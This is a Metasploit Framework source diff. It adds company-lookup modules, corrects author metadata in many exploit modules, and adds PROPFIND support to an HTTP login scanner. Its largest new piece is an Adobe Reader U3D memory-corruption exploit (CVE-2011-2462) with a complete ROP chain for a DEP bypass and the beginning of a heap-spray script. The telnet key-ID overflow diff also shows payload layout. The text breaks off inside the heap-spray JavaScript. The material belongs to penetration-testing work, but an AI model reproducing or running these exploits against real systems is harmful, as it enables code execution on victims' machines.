loot << ("\nSubdivision: " + (subdiv = grab_text(e, "subdiv_code")))
loot << ("\nTop parent: " + (top_parent = grab_text(e, "top_parent_id")))
loot << ("\nNumber of parents: " + (num_parents = grab_text(e, "num_parents")))
loot << ("\nNumber of children: " + (num_children = grab_text(e, "num_children")))
loot << ("\nMax searchable year: " + (max_year = grab_text(e, "max_year")))
loot << ("\nMin searchable year: " + (min_year = grab_text(e, "min_year")))
loot << "\n\n\n"
print_line("\n")
print_status("Child Information\n--------------------")
print_status("CorpWatch ID: " + cwid)
print_status("Central Index Key (CIK): " + cik)
print_status("Full Name: " + name)
print_status("IRS Number: " + irsno)
print_status("SIC Code: " + sic_code)
print_status("Sector: " + sector)
print_status("Source Type: " + source)
print_line("")
print_status("Address and Location Information\n-----------------------------")
print_status("Full Address: " + address)
print_status("Country Code: " + country)
print_status("Subdivision: " + subdiv)
print_line("")
print_status("Parent and Children Information\n---------------------------")
print_status("Top Parent ID: " + top_parent)
print_status("Number of parent companies: " + num_parents)
print_status("Number of child companies: " + num_children)
print_status("Max lookup year: " + max_year)
print_status("Min lookup year: " + min_year)
}
end
end
end
if datastore['GET_HISTORY']
res = send_request_cgi({
'uri' => uri + "/history.xml",
'method' => 'GET'
}, 25)
if res == nil
print_error("Server down or bad response")
return
end
begin
doc = REXML::Document.new(res.body)
rescue
print_error("Query return bad or broken data")
return
end
root = doc.root
elements = root.get_elements("result")
if elements == nil || elements.length == 0
print_error("No results.")
return
end
results = elements[0]
if results == nil
print_status("No results returned.")
else
results = results.get_elements("companies")[0]
results.elements.each { |e|
loot << ("CorpWatch ID: " + (cwid = grab_text(e, "cw_id")))
loot << ("\nCentral Index Key: " + (cik = grab_text(e, "cik")))
loot << ("\nIRS Number: " + (irsno = grab_text(e, "irs_number")))
loot << ("\nSIC Code: " + (sic_code = grab_text(e, "sic_code")))
loot << ("\nIndustry: " + (industry = grab_text(e, "industry_name")))
loot << ("\nSector: " + (sector = grab_text(e, "sector_name")))
loot << ("\nSIC Sector: " + (sic_sector = grab_text(e, "sic_sector")))
loot << ("\nSource: " + (source = grab_text(e, "source_type")))
loot << ("\nAddress: " + (address = grab_text(e, "raw_address")))
loot << ("\nCountry: " + (country_code = grab_text(e, "country_code")))
loot << ("\nSub-division Code: " + (subdiv_code = grab_text(e, "subdiv_code")))
loot << ("\nTop parent ID: " + (top_parent = grab_text(e, "top_parent_id")))
loot << ("\nNumber of parents: " + (num_parents = grab_text(e, "num_parents")))
loot << ("\nNumber of children: " + (num_children = grab_text(e, "num_children")))
loot << ("\nMax searchable year: " + (max_year = grab_text(e, "max_year")))
loot << ("\nMin searchable year: " + (min_year = grab_text(e, "min_year")))
loot << ("\nHistory year: " + (history_year = grab_text(e, "year")))
loot << "\n\n\n"
print_line("\n")
print_status("Company History for year #{history_year}\n--------------------------------")
print_status("CorpWatch ID: " + cwid)
print_status("Central Index Key: " + cik)
print_status("IRS number: " + irsno)
print_status("SIC Code: " + sic_code)
print_status("Industry: " + industry)
print_status("Sector: " + sector)
print_status("SIC Sector: " + sic_sector)
print_status("Source: " + source)
print_status("Address: " + address)
print_status("Country: " + country_code)
print_status("Subdivision: " + subdiv_code)
print_status("Top Parent ID: " + top_parent)
print_status("Number of parents: " + num_parents)
print_status("Number of children: " + num_children)
print_status("Max lookup year: " + max_year)
print_status("Min lookup year: " + min_year)
}
end
end
p = store_loot("corpwatch_api.#{datastore['CW_ID']}_info","text/plain",nil,loot,"company_#{datastore['CW_ID']}.txt","#{datastore["CW_ID"]} Specific Information")
print_line()
print_status("Saved in: #{p}")
end
def grab_text(e, name)
(e.get_elements(name) && e.get_elements(name)[0] &&
e.get_elements(name)[0].get_text ) ?
e.get_elements(name)[0].get_text.to_s : ""
end
end

140
modules/auxiliary/gather/corpwatch_lookup_name.rb Normal file
View File

@ -0,0 +1,140 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rexml/document'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'CorpWatch Company Name Information Search',
'Description' => %q{
This module interfaces with the CorpWatch API to get publicly available
info for a given company name. Please note that by using CorpWatch API, you
acknolwdge the limitations of the data CorpWatch provides, and should always
verify the information with the official SEC filings before taking any action.
},
'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],
'References' =>
[
[ 'URL', 'http://api.corpwatch.org/' ]
]
))
register_options(
[
OptString.new('COMPANY_NAME', [ true, "Search for companies with this name", ""]),
OptString.new('YEAR', [ false, "Limit results to a specific year", ""]),
OptString.new('LIMIT', [ true, "Limit the number of results returned", "5"]),
OptString.new('API_KEY', [ false, "Use this API key when getting the data", ""]),
], self.class)
deregister_options('RHOST', 'RPORT', 'Proxies', 'VHOST')
end
def cleanup
datastore['RHOST'] = @old_rhost
datastore['RPORT'] = @old_rport
end
def run
# Save the original rhost/rport in case the user was exploiting something else
@old_rhost = datastore['RHOST']
@old_rport = datastore['RPORT']
# Initial api.corpwatch.org's rhost and rport for HttpClient
datastore['RHOST'] = 'api.corpwatch.org'
datastore['RPORT'] = 80
uri = "/"
uri << (datastore['YEAR'] + "/") if datastore['YEAR'] != ""
uri << "companies.xml"
res = send_request_cgi(
{
'uri' => uri,
'method' => 'GET',
'vars_get' =>
{
'company_name' => datastore['COMPANY_NAME'],
'limit' => datastore['LIMIT'],
'key' => datastore['API_KEY']
}
}, 25)
if not res
print_error("Server down, bad response")
return
end
begin
doc = REXML::Document.new(res.body)
rescue
print_error("Body not well formed XML")
return
end
root = doc.root
if not root
print_error("document root nil")
return
end
elements = root.get_elements("result")
if not elements
print_error("Document root has no results")
return
end
results = elements[0]
if not results
print_error("No results returned, try another search")
return
end
elements = results.get_elements("companies")
if not elements
print_error("No companies returned")
return
end
results = elements[0]
return if not results.elements || results.elements.length == 0
results.elements.each { |e|
cwid = grab_text(e, "cw_id")
company_name = grab_text(e, "company_name")
address = grab_text(e, "raw_address")
sector = grab_text(e, "sector_name")
industry = grab_text(e, "industry_name")
print_status("Company Information\n---------------------------------")
print_status("CorpWatch (cw) ID): " + cwid)
print_status("Company Name: " + company_name)
print_status("Address: " + address)
print_status("Sector: " + sector)
print_status("Industry: " + industry)
}
end
def grab_text(e, name)
(e.get_elements(name) && e.get_elements(name)[0] &&
e.get_elements(name)[0].get_text ) ?
e.get_elements(name)[0].get_text.to_s : ""
end
end

2
modules/auxiliary/scanner/dect/call_scanner.rb
View File

@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'DECT Call Scanner',
'Version' => '$Revision$',
'Description' => 'This module scans for active DECT calls',
'Author' => [ 'DK <privilegedmode@gmail.com>' ],
'Author' => [ 'DK <privilegedmode[at]gmail.com>' ],
'License' => MSF_LICENSE,
'References' => [ ['URL', 'http://www.dedected.org'] ]
)

2
modules/auxiliary/scanner/dect/station_scanner.rb
View File

@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'DECT Base Station Scanner',
'Version' => '$Revision$',
'Description' => 'This module scans for DECT base stations',
'Author' => [ 'DK <privilegedmode@gmail.com>' ],
'Author' => [ 'DK <privilegedmode[at]gmail.com>' ],
'License' => MSF_LICENSE,
'References' => [ ['URL', 'http://www.dedected.org'] ]
)

19
modules/auxiliary/scanner/http/http_login.rb
View File

@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary
OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line",
File.join(Msf::Config.install_root, "data", "wordlists", "http_default_pass.txt") ]),
OptString.new('AUTH_URI', [ false, "The URI to authenticate against (default:auto)" ]),
OptString.new('REQUESTTYPE', [ false, "Use HTTP-GET or HTTP-PUT for Digest-Auth (default:GET)", "GET" ])
OptString.new('REQUESTTYPE', [ false, "Use HTTP-GET or HTTP-PUT for Digest-Auth, PROPFIND for WebDAV (default:GET)", "GET" ])
], self.class)
register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ])
end
@ -277,6 +277,16 @@ class Metasploit3 < Msf::Auxiliary
'DigestAuthUser' => user,
'DigestAuthPassword' => pass
}, 25)
elsif requesttype == "PROPFIND"
res,c = send_digest_request_cgi({
'uri' => path,
'method' => requesttype,
'data' => '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>',
#'DigestAuthIIS' => false,
'DigestAuthUser' => user,
'DigestAuthPassword' => pass,
'headers' => { 'Depth' => '0'}
}, 25)
else
res,c = send_digest_request_cgi({
'uri' => path,
@ -294,7 +304,7 @@ class Metasploit3 < Msf::Auxiliary
return :abort if (res.code == 404)
if (res.code == 200) or (res.code == 201)
if (res.code == 200) or (res.code == 201)
if ((res.code == 201) and (requesttype == "PUT"))
print_good("Trying to delete #{path}")
del_res,c = send_digest_request_cgi({
@ -311,6 +321,11 @@ class Metasploit3 < Msf::Auxiliary
return :success
end
if (res.code == 207) and (requesttype == "PROPFIND")
@proof = res
return :success
end
rescue ::Rex::ConnectionError
vprint_error("#{target_url} - Failed to connect to the web server")
return :abort

11
modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb
View File

@ -21,17 +21,18 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'FreeBSD Telnet Service Encyption Key ID Buffer Overflow',
'Name' => 'FreeBSD Telnet Service Encryption Key ID Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the encryption option handler of the
FreeBSD telnet service.
},
'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry', 'Dan Rosenberg', 'hdm' ],
'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry <bperry.volatile[at]gmail.com>', 'Dan Rosenberg', 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
['BID', '51182'],
['CVE', '2011-4862'],
['OSVDB', '78020'],
['BID', '51182'],
['URL', 'http://www.exploit-db.com/exploits/18280/']
],
'Privileged' => true,
@ -57,8 +58,8 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'FreeBSD 5.3', { 'Ret' => 0x8059730 } ], # direct return
# Versions 5.2 and below do not support encyption
],
'DefaultTarget' => 0,
'DisclosureDate' => ''))
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 23 2011'))
end
def exploit_target(t)

32
modules/exploits/linux/telnet/telnet_encrypt_keyid.rb
View File

@ -21,19 +21,20 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Linux BSD-derived Telnet Service Encyption Key ID Buffer Overflow',
'Name' => 'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the encryption option handler of the
Linux BSD-derived telnet service (inetutils or krb5-telnet). Most Linux distributions
use NetKit-derived telnet daemons, so this flaw only applies to a small subset of
Linux systems running telnetd.
},
'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry', 'Dan Rosenberg', 'hdm' ],
'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry <bperry.volatile[at]gmail.com>', 'Dan Rosenberg', 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
['BID', '51182'],
['CVE', '2011-4862'],
['OSVDB', '78020'],
['BID', '51182'],
['URL', 'http://www.exploit-db.com/exploits/18280/']
],
'Privileged' => true,
@ -47,16 +48,15 @@ class Metasploit3 < Msf::Exploit::Remote
'Targets' =>
[
[ 'Automatic', { } ],
[ 'Red Hat Enterprise Linux 3 (krb5-telnet)', { 'Ret' => 0x0804b43c } ],
[ 'Automatic', { } ],
[ 'Red Hat Enterprise Linux 3 (krb5-telnet)', { 'Ret' => 0x0804b43c } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => ''))
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 23 2011'))
end
def exploit_target(t)
connect
banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)
print_status(banner_sanitized) if datastore['VERBOSE']
@ -71,20 +71,20 @@ class Metasploit3 < Msf::Exploit::Remote
key_id[ 0, 2] = "\xeb\x76"
key_id[72, 4] = [ t['Ret'] - 20 ].pack("V")
key_id[76, 4] = [ t['Ret'] ].pack("V")
key_id[76, 4] = [ t['Ret'] ].pack("V")
# Some of these bytes can get mangled, jump over them
key_id[80,40] = "\x41" * 40
# Insert the real payload
key_id[120, penc.length] = penc
# Create the Key ID command
sploit = enc_keyid + key_id + end_suboption
# Initiate encryption
sock.put(enc_init)
# Wait for a successful response
loop do
data = sock.get_once(-1, 5) rescue nil
@ -107,12 +107,12 @@ class Metasploit3 < Msf::Exploit::Remote
# Some delay between each request seems necessary in some cases
::IO.select(nil, nil, nil, 0.5)
# The second request results in the pointer being called
print_status("Sending second payload...")
sock.put(sploit)
handler
::IO.select(nil, nil, nil, 0.5)
disconnect
end

6
modules/exploits/multi/http/phpldapadmin_query_engine.rb
View File

@ -27,9 +27,9 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Author' =>
[
'EgiX <n0b0d13s[at]gmail-com>', # original discovery/poc
'mr_me <steventhomasseeley[at]gmail-com>', # msf
'TecR0c <roccogiovannicalvi[at]gmail-com >', # msf
'EgiX <n0b0d13s[at]gmail.com>', # original discovery/poc
'mr_me <steventhomasseeley[at]gmail.com>', # msf
'TecR0c <roccogiovannicalvi[at]gmail.com >', # msf
],
'License' => MSF_LICENSE,
'Version' => '$Revision$',

3
modules/exploits/multi/http/plone_popen2.rb
View File

@ -27,11 +27,12 @@ class Metasploit3 < Msf::Exploit::Remote
[
'Plone Security team', # Vulnerability discovery
'Nick Miles', # Original exploit
'TecR0c' # Metasploit module
'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit module
],
'References' =>
[
['CVE', '2011-3587'],
['OSVDB', '76105'],
['URL', 'http://www.exploit-db.com/exploits/18262/'],
['URL', 'http://plone.org/products/plone/security/advisories/20110928']
],

2
modules/exploits/multi/http/pmwiki_pagelist.rb
View File

@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' =>
[
'EgiX', # Vulnerability discovery and exploit
'TecR0c' # Metasploit Module
'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit Module
],
'References' =>
[

14
modules/exploits/multi/http/splunk_mappy_exec.rb
View File

@ -17,15 +17,13 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Splunk Search Remote Code Execution',
'Description' => %q{
This module abuses a command execution vulnerability within the
This module abuses a command execution vulnerability in the
web based interface of Splunk 4.2 to 4.2.4. The vulnerability exists
within the 'mappy' search command which allows to run python code.
To exploit this vulnerability a valid Splunk user with the admin
role is required. Unfortunately, Splunk uses a default credential of
'admin:changeme' for admin access, which is used to leverage our attack.
The Splunk Web interface runs as SYSTEM on Windows and as root
on Linux by default.
in the 'mappy' search command which allows attackers to run Python code.
To exploit this vulnerability, a valid Splunk user with the admin
role is required. By default, this module uses the credential of "admin:changeme",
the default Administrator credential for Splunk. Note that the Splunk web interface
runs as SYSTEM on Windows and as root on Linux by default.
},
'Author' =>
[

2
modules/exploits/multi/http/traq_plugin_exec.rb
View File

@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' =>
[
'EgiX', # Vulnerability discovery and exploit
'TecR0c' # Metasploit Module
'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit Module
],
'References' =>
[

2
modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
View File

@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' =>
[
'shinnai', # original discovery
'mr_me', # msf
'mr_me <steventhomasseeley[at]gmail.com>', # msf
'sinn3r' # wbemexec tekniq
],
'Version' => '$Revision$',

4
modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb
View File

@ -29,8 +29,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' =>
[
'Dr_IDE', # Vulnerability discovery and original exploit
'TecR0c', # Metasploit module
'mr_me' # Metasploit module
'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module
'mr_me <steventhomasseeley[at]gmail.com>' # Metasploit module
],
'Version' => '$Revision: $',
'References' =>

2
modules/exploits/windows/browser/mozilla_mchannel.rb
View File

@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
'regenrecht', # discovery
'Rh0', # metasploit module
'mr_me' # win7 target
'mr_me <steventhomasseeley[at]gmail.com>' # win7 target
],
'Version' => "$Revision$",
'References' =>

4
modules/exploits/windows/browser/mozilla_reduceright.rb
View File

@ -35,8 +35,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Matteo Memelli', #PoC from Exploit-DB
'dookie2000ca', #"Helping" ryujin (Matteo)
'sinn3r', #Metasploit
'mr_me', #XP target (no aslr)
'TecR0c', #XP target (no aslr)
'mr_me <steventhomasseeley[at]gmail.com>', #XP target (no aslr)
'TecR0c <roccogiovannicalvi[at]gmail.com>', #XP target (no aslr)
],
'References' =>
[

2
modules/exploits/windows/browser/ms06_071_xml_core.rb
View File

@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'Author' =>
[
'Trirat Puttaraksa <trir00t [at] gmail.com>',
'Trirat Puttaraksa <trir00t[at]gmail.com>',
],
'Version' => '$Revision$',
'References' =>

1
modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
View File

@ -152,6 +152,7 @@ class Metasploit3 < Msf::Exploit::Remote
if target.name == 'Automatic'
mytarget = auto_target(cli, request)
if mytarget.nil?
agent = request.headers['User-Agent']
print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
send_not_found(cli)
return

2
modules/exploits/windows/browser/novelliprint_callbackurl.rb
View File

@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'Trancer <mtrancer[at]gmail.com' ],
'Author' => [ 'Trancer <mtrancer[at]gmail.com>' ],
'Version' => '$Revision$',
'References' =>
[

2
modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb
View File

@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
property of ienipp.ocx an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'Trancer <mtrancer[at]gmail.com' ],
'Author' => [ 'Trancer <mtrancer[at]gmail.com>' ],
'Version' => '$Revision$',
'References' =>
[

4
modules/exploits/windows/browser/pcvue_func.rb
View File

@ -28,8 +28,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' =>
[
'Luigi Auriemma', # original find
'mr_me <steventhomasseeley[at]gmail-com>', # msf module
'TecR0c <roccogiovannicalvi[at]gmail-com >',# msf module
'mr_me <steventhomasseeley[at]gmail.com>', # msf module
'TecR0c <roccogiovannicalvi[at]gmail.com >',# msf module
],
'Version' => '$Revision$',
'References' =>

4
modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
View File

@ -29,8 +29,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' =>
[
'shinnai', # Vulnerability discovery and original exploit
'TecR0c', # Metasploit module
'mr_me' # Metasploit module
'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module
'mr_me <steventhomasseeley[at]gmail.com>' # Metasploit module
],
'Version' => '$Revision: $',
'References' =>

2
modules/exploits/windows/browser/winamp_playlist_unc.rb
View File

@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' =>
[
'hdm',
'Faithless <rhyskidd [at] gmail.com>'
'Faithless <rhyskidd[at]gmail.com>'
],
'Version' => '$Revision$',
'References' =>

2
modules/exploits/windows/fileformat/adobe_libtiff.rb
View File

@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' =>
[
'Microsoft', # reported to Adobe
'villy <villys777 [at] gmail.com>', # public exploit
'villy <villys777[at]gmail.com>', # public exploit
# Metasploit version by:
'jduck'
],

652
modules/exploits/windows/fileformat/adobe_reader_u3d.rb Normal file
View File

@ -0,0 +1,652 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'zlib'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe Reader U3D Memory Corruption Vulnerability',
'Description' => %q{
This module exploits a vulnerability in the U3D handling within
versions 9.x through 9.4.6 and 10 through to 10.1.1 of Adobe Reader.
The vulnerability is due to the use of uninitialized memory.
Arbitrary code execution is achieved by embedding specially crafted U3D
data into a PDF document. A heap spray via JavaScript is used in order to
ensure that the memory used by the invalid pointer issue is controlled.
},
'License' => MSF_LICENSE,
'Author' =>
[
'sinn3r',
'juan vazquez',
'jduck'
],
'References' =>
[
[ 'CVE', '2011-2462' ],
[ 'OSVDB', '77529' ],
[ 'BID', '50922' ],
[ 'URL', 'http://www.adobe.com/support/security/advisories/apsa11-04.html' ],
[ 'URL', 'http://blog.vulnhunt.com/index.php/2011/12/12/cve-2011-2462-pdf-0day-analysis/' ],
[ 'URL', 'http://blog.9bplus.com/analyzing-cve-2011-2462' ],
[ 'URL', 'http://contagiodump.blogspot.com/2011/12/adobe-zero-day-cve-2011-2462.html' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
[
# Adobe Reader 9.4.0 / XP SP3
# Adobe Reader 9.4.5 / XP SP3
# Adobe Reader 9.4.6 / XP SP3
'Adobe Reader 9.4.0 / 9.4.5 / 9.4.6 on Win XP SP3',
{
# gadget from icucnv36:
# mov ecx,dword ptr [eax+3Ch]
# mov eax,dword ptr [ecx]
# call dword ptr [eax+1Ch]
'Ret' => 0x4a8453c3
}
],
],
'DisclosureDate' => 'Dec 06 2011', #Needs to be checked
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
], self.class)
end
def junk(n=1)
tmp = []
value = rand_text(4).unpack("L")[0].to_i
n.times { tmp << value }
return tmp
end
def exploit
# DEP bypass; uses icucnv36.dll
stack_data = [
junk,
0x0c0c0c0c, # mapped at 0x0c0c0c0c # becomes edi after stackpivot
0x0c0c0c0c, # becomes esi
0x4a806f29, # pop edi / pop esi / pop ebp / ret 14h
0x4a8a0000, # becomes edi
0x4a802196, # becomes esi
0x4a801f90, # becomes ebp
0x4a806f29, # pop edi / pop esi / pop ebp / ret 14h
0x4a806cef, # Stackpivot! xchg eax,esp (eax=0x0c0c0c0c) / xor al, al / pop edi / pop esi / ret # padding
junk(4),
0x00000000, # becomes edi
0x00000002, # becomes esi
0x00000102, # becomes ebp
0x4a806f29, # pop edi / pop esi / pop ebp / ret 14h
junk(5),
0x4a80a8a6, # becomes edi
0x4a801f90, # becomes esi
0x4a849038, # becomes ebp
0x4a8063a5, # pop ecx / ret
junk(5),
0x4a8a0000, # becomes ecx
0x4a802196, # mov dword ptr [ecx],eax / ret # Stores eax (stack address)
0x4a801f90, # pop eax / ret
0x4a84903c, # becomes eax (import for CreateFileA)
0x4a80b692, # jmp dword ptr [eax] {kernel32!CreateFileA}
0x4a801064, # ret for CreateFileA # ret
0x00000000, # __in LPCTSTR lpFileName
0x10000000, # __in DWORD dwDesiredAccess
0x00000000, # __in DWORD dwShareMode
0x00000000, # __in_opt LPSECURITY_ATTRIBUTES lpSecurityAttributes
0x00000002, # __in DWORD dwCreationDisposition
0x00000102, # __in DWORD dwFlagsAndAttributes
0x00000000, # __in_opt HANDLE hTemplateFile
0x4a8063a5, # pop ecx / ret
0x4a801064, # becomes ecx
0x4a842db2, # xchg eax, edi / ret
0x4a802ab1, # pop ebx / ret
0x00000008, # becomes ebx
0x4a80a8a6, # and dword ptr [esp+ebx*2],edi (esp+ebx*2 = 0x0c0c0ce0, edi = {Result of CreateFileA}) / jne 4a80a8ae [br=1] / cmp al,2Fh / je 4a80a8ab [br=0] / cmp al,41h / jl 4a80a8ba [br=1] / cmp al,61h / jl 4a80a8c8) [br=1] / xor al,al / ret
0x4a801f90, # pop eax / ret
0x4a849038, # becomes eax (import for CreateFileA)
0x4a80b692, # jmp dword ptr [eax] {kernel32!CreateFileMappingA}
0x4a801064, # ret for CreateFileMappingA # ret
0xffffffff, # __in HANDLE hFile # mapped at 0c0c0ce0 => Stores Result of CreateFileA
0x00000000, # __in_opt LPSECURITY_ATTRIBUTES lpAttributes,
0x00000040, # __in DWORD flProtect,
0x00000000, # __in DWORD dwMaximumSizeHigh,
0x00010000, # __in DWORD dwMaximumSizeLow,
0x00000000, # __in_opt LPCTSTR lpName
0x4a8063a5, # pop ecx / ret
0x4a801064, # becomes ecx
0x4a842db2, # xchg eax, edi / ret
0x4a802ab1, # pop ebx / ret
0x00000008, # becomes ebx
0x4a80a8a6, # and dword ptr [esp+ebx*2],edi (esp+ebx*2 = 0x0c0c0d20, edi = {Result of FileMappingA}) / jne 4a80a8ae [br=1] / cmp al,2Fh / je 4a80a8ab [br=0] / cmp al,41h / jl 4a80a8ba [br=1] / cmp al,61h / jl 4a80a8c8) [br=1] / xor al,al / ret
0x4a801f90, # pop eax / ret
0x4a849030, # becomes eax (import for kernel32!MapViewOfFile)
0x4a80b692, # jmp dword ptr [eax] {kernel32!MapViewOfFile}
0x4a801064, # ret for MapViewOfFile # ret
0xffffffff, # __in HANDLE hFileMappingObject # mapped at 0x0c0c0d20 => {Result of FileMappingA}
0x00000022, # __in DWORD dwDesiredAccess
0x00000000, # __in DWORD dwFileOffsetHigh
0x00000000, # __in DWORD dwFileOffsetLow
0x00010000, # __in SIZE_T dwNumberOfBytesToMap
0x4a8063a5, # pop ecx / ret
0x4a8a0004, # becomes ecx
0x4a802196, # mov dword ptr [ecx],eax / ret # Stores result of MapViewOfFile
0x4a8063a5, # pop ecx / ret
0x4a801064, # becomes ecx
0x4a842db2, # xchg eax, edi / ret
0x4a802ab1, # pop ebx / ret
0x00000030, # becomes ebx
0x4a80a8a6, # and dword ptr [esp+ebx*2],edi (esp+ebx*2 = 0c0c0db8, edi = {Result of MapViewOfFile} / jne 4a80a8ae [br=1] / cmp al,2Fh / je 4a80a8ab [br=0] / cmp al,41h / jl 4a80a8ba [br=1] / cmp al,61h / jl 4a80a8c8) [br=1] / xor al,al / ret
0x4a801f90, # pop eax / ret
0x4a8a0004, # becomes eax {Result of MapViewOfFile}
0x4a80a7d8, # mov eax,dword ptr [eax] / ret
0x4a8063a5, # pop ecx / ret
0x4a801064, # becomes ecx
0x4a842db2, # xchg eax, edi / ret
0x4a802ab1, # pop ebx / ret
0x00000020, # becomes ebx
0x4a80a8a6, # and dword ptr [esp+ebx*2],edi (esp+ebx*2 = 0c0c0dbc, edi = {Result of MapViewOfFile} / jne 4a80a8ae [br=1] / cmp al,2Fh / je 4a80a8ab [br=0] / cmp al,41h / jl 4a80a8ba [br=1] / cmp al,61h / jl 4a80a8c8) [br=1] / xor al,al / ret
0x4a8063a5, # pop ecx / ret
0x4a801064, # becomes ecx
0x4a80aedc, # lea edx,[esp+0Ch] (edx => 0c0c0d94) / push edx {0c0c0d94} / push eax {Result of MapViewOfFile} / push dword ptr [esp+0Ch] ([0c0c0d8c] => 0x34) / push dword ptr [4a8a093c] ([4a8a093c] = 0x0) / call ecx (u 0x4a801064 => ret) / add esp, 10h / ret
0x4a801f90, # pop eax / ret
0x00000034, # becomes eax # mapped at 0c0c0d8c
0x4a80d585, # add eax, edx / ret (eax => 0c0c0dc8 => shellcode after ROP chain)
0x4a8063a5, # pop ecx / ret # mapped at 0c0c0d94
0x4a801064, # becomes ecx
0x4a842db2, # xchg eax,edi (edi becomes 0c0c0d8c, eax becomes Result of MapViewOfFile) / ret
0x4a802ab1, # pop ebx / ret
0x0000000a, # becomes ebx
0x4a80a8a6, # and dword ptr [esp+ebx*2],edi (esp+ebx*2 = 0c0c0dc0, edi = {shellcode after ROP chain} / jne 4a80a8ae [br=1] / cmp al,2Fh / je 4a80a8ab [br=0] / cmp al,41h / jl 4a80a8ba [br=1] / cmp al,61h / jl 4a80a8c8) [br=1] / xor al,al / ret
0x4a801f90, # pop eax / ret
0x4a849170, # becomes eax (import for MSVCR80!memcpy)
0x4a80b692, # jmp dword ptr [eax] {MSVCR80!memcpy}
0xffffffff, # ret for memcpy # mapped at 0c0c0db8 => Result of MapViewOfFile
0xffffffff, # dst (memcpy param) # mapped at 0c0c0dbc => Result of MapViewOfFile
0xffffffff, # src (memcpy param) # mapped at 0c0c0dc0 => Address of shellcode after ROP chain
0x00001000 # length (memcpy param)
].flatten.pack('V*')
payload_buf = ''
payload_buf << stack_data
payload_buf << payload.encoded
escaped_payload = Rex::Text.to_unescape(payload_buf)
eip_ptr =
[
junk(3),
target.ret, # EIP
junk(7),
0x0c0c0c0c, # [eax+3Ch] => becomes ecx / [0x0c0c0c0c] = 0x0c0c0c0c / [0x0c0c0c0c+1Ch] = 4a806cef => stackpivot
junk(16),
].flatten.pack('V*')
escaped_eip = Rex::Text.to_unescape(eip_ptr)
js = <<-JS
var padding;
var bbb, ccc, ddd, eee, fff, ggg, hhh;
var pointers_a, i;
var x = new Array();
var y = new Array();
